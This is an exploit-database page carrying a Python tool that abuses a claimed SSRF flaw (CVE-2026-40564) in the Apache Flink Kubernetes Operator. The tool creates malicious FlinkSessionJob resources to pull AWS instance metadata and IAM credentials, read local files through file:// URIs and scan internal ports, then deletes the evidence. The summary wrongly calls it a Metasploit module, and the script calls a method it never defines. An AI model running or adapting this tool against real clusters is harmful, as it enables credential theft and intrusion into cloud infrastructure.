Share
## https://sploitus.com/exploit?id=PACKETSTORM:223525
==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================
[+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import json
import sys
import time
import urllib.request
import urllib.parse
import ssl
import re
from typing import Optional, Dict, List, Tuple
class FlinkOperatorSSRF:
def __init__(self, api_server: str, token: str = None, namespace: str = "default",
verify_ssl: bool = False, timeout: int = 30):
self.api_server = api_server.rstrip('/')
self.namespace = namespace
self.timeout = timeout
self.verify_ssl = verify_ssl
self.headers = {
'Content-Type': 'application/json'
}
if token:
self.headers['Authorization'] = f'Bearer {token}'
self.ctx = ssl.create_default_context()
if not verify_ssl:
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
def log(self, msg: str, level: str = "INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m",
"PROC": "\033[94m[@]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
"""Make Kubernetes API request"""
url = f"{self.api_server}{path}"
req = urllib.request.Request(url, method=method, headers=self.headers)
if data:
req.add_header('Content-Type', 'application/json')
req.data = json.dumps(data).encode('utf-8')
try:
with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
body = resp.read().decode('utf-8')
if body:
return resp.status, json.loads(body)
return resp.status, None
except urllib.error.HTTPError as e:
if e.code == 409: # Conflict - resource may already exist
return e.code, None
body = e.read().decode('utf-8') if e.fp else ''
self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
return e.code, None
except Exception as e:
self.log(f"Request failed: {e}", "ERROR")
return None, None
def find_operator_pod(self) -> Optional[str]:
"""Find Flink operator pod in the cluster"""
self.log("Searching for Flink operator pod...", "PROC")
status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
if status == 200 and pods:
for pod in pods.get('items', []):
name = pod.get('metadata', {}).get('name', '')
if 'flink-kubernetes-operator' in name.lower():
self.log(f"Found operator pod: {name}", "SUCCESS")
return name
self.log("Could not find operator pod", "WARNING")
return None
def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
"""Fetch operator pod logs"""
status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
if status == 200:
return logs if isinstance(logs, str) else str(logs)
return None
def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
"""Create malicious FlinkSessionJob"""
manifest = {
"apiVersion": "flink.apache.org/v1beta1",
"kind": "FlinkSessionJob",
"metadata": {
"name": name,
"namespace": self.namespace
},
"spec": {
"job": {
"jarURI": jar_uri,
"parallelism": 1,
"upgradeMode": "stateless"
},
"flinkConfiguration": {},
"jobManager": {},
"taskManager": {}
}
}
status, _ = self.k8s_request(
'POST',
f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
manifest
)
if status == 201:
self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
return True
self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
return False
def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
"""Delete Kubernetes resource"""
path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
status, _ = self.k8s_request('DELETE', path)
if status in [200, 202, 204]:
self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
return True
return False
def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
"""Get resource status"""
path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
status, data = self.k8s_request('GET', path)
if status == 200:
return data
return None
def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
"""Execute SSRF attack"""
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
resource_name = f"ssrf-{int(time.time())}"
self.log(f"Creating SSRF resource: {resource_name}", "PROC")
self.log(f"Target URL: {jar_uri}")
if use_session_cluster:
success = self.create_flink_session_job(resource_name, jar_uri)
else:
success = self.create_flink_deployment(resource_name, jar_uri)
if not success:
return False
self.log("Waiting for operator reconciliation (15s)...", "PROC")
time.sleep(15)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
status_text = json.dumps(status['status'])
self.log(f"Resource status: {status_text[:200]}...")
error_keywords = [
'Failed to fetch',
'Connection refused',
'connect timed out',
'UnknownHostException',
'FileNotFoundException'
]
for keyword in error_keywords:
if keyword in status_text:
self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
break
operator_pod = self.find_operator_pod()
if operator_pod:
self.log("Fetching operator logs...", "PROC")
logs = self.get_operator_logs(operator_pod, 200)
if logs and jar_uri in logs:
self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
if 'GET' in logs and jar_uri in logs:
self.log("HTTP GET request confirmed in logs", "SUCCESS")
ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
if ua_match:
self.log(f"User-Agent: {ua_match.group(1)}")
self.log("Cleaning up resources...", "PROC")
self.delete_resource(resource_name, resource_type)
return True
def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
"""Attempt to read AWS instance metadata"""
self.log("Attempting to read AWS metadata via SSRF...", "PROC")
metadata_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/user-data/",
"http://169.254.169.254/latest/dynamic/instance-identity/document"
]
results = {}
for url in metadata_urls:
self.log(f"Trying: {url}")
resource_name = f"ssrf-metadata-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, url)
else:
self.create_flink_deployment(resource_name, url)
time.sleep(10)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
self.log(f"Metadata found at {url}!", "SUCCESS")
roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
results[url] = status_text
for role in roles:
if len(role) > 3 and not role.isdigit():
self.log(f" Role: {role}")
self.delete_resource(resource_name, resource_type)
time.sleep(1)
return results if results else None
def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
"""Attempt to read local file via file:// scheme"""
self.log(f"Attempting to read file: {filepath}", "PROC")
jar_uri = f"file://{filepath}"
resource_name = f"ssrf-file-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, jar_uri)
else:
self.create_flink_deployment(resource_name, jar_uri)
time.sleep(10)
status = self.get_resource_status(resource_name, resource_type)
content = None
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'file://' in status_text:
file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
if file_content:
content = file_content.group(1)
self.log(f"File content extracted:", "SUCCESS")
print("\n" + "=" * 65)
print(content)
print("=" * 65)
self.delete_resource(resource_name, resource_type)
return content
def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
"""Scan internal ports via SSRF"""
self.log(f"Scanning {host} ports: {ports}", "PROC")
open_ports = []
for port in ports:
url = f"http://{host}:{port}/"
self.log(f"Testing port {port}...")
resource_name = f"ssrf-scan-{port}-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, url)
else:
self.create_flink_deployment(resource_name, url)
time.sleep(5)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'Connection refused' in status_text:
self.log(f"Port {port}: closed")
elif 'connect timed out' in status_text:
self.log(f"Port {port}: timeout (maybe filtered)")
elif 'Failed to fetch' not in status_text:
self.log(f"Port {port}: OPEN or responding", "SUCCESS")
open_ports.append(port)
self.delete_resource(resource_name, resource_type)
return open_ports
def run(self, ssrf_url: str = None, use_session_cluster: bool = True,
read_metadata: bool = False, read_file: str = None,
scan_host: str = None, scan_ports: List[int] = None) -> bool:
"""Main exploit routine"""
self.log(f"Target: {self.api_server}")
self.log(f"Namespace: {self.namespace}")
status, _ = self.k8s_request('GET', '/version')
if status != 200:
self.log("Cannot connect to Kubernetes API", "ERROR")
return False
self.log("Connected to Kubernetes API", "SUCCESS")
if read_metadata:
metadata = self.read_aws_metadata(use_session_cluster)
if metadata:
self.log("AWS metadata extraction complete", "SUCCESS")
return True
elif read_file:
content = self.read_local_file(read_file, use_session_cluster)
if content:
return True
elif scan_host and scan_ports:
open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
if open_ports:
self.log(f"Open ports: {open_ports}", "SUCCESS")
return bool(open_ports)
elif ssrf_url:
return self.check_ssrf(ssrf_url, use_session_cluster)
else:
self.log("No action specified", "ERROR")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
)
parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
parser.add_argument("--token", help="Bearer token for authentication")
parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
parser.add_argument("--read-file", help="Read local file via file:// scheme")
parser.add_argument("--scan-host", help="Host to scan for open ports")
parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
parser.add_argument("--timeout", type=int, default=30, help="Request timeout")
args = parser.parse_args()
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF โ
โ Server-Side Request Forgery via jarURI โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
exploit = FlinkOperatorSSRF(
api_server=args.api_server,
token=args.token,
namespace=args.namespace,
verify_ssl=not args.insecure,
timeout=args.timeout
)
scan_ports = None
if args.scan_ports:
scan_ports = [int(p.strip()) for p in args.scan_ports.split(',')]
success = exploit.run(
ssrf_url=args.ssrf_url,
use_session_cluster=not args.use_deployment,
read_metadata=args.read_aws_metadata,
read_file=args.read_file,
scan_host=args.scan_host,
scan_ports=scan_ports
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================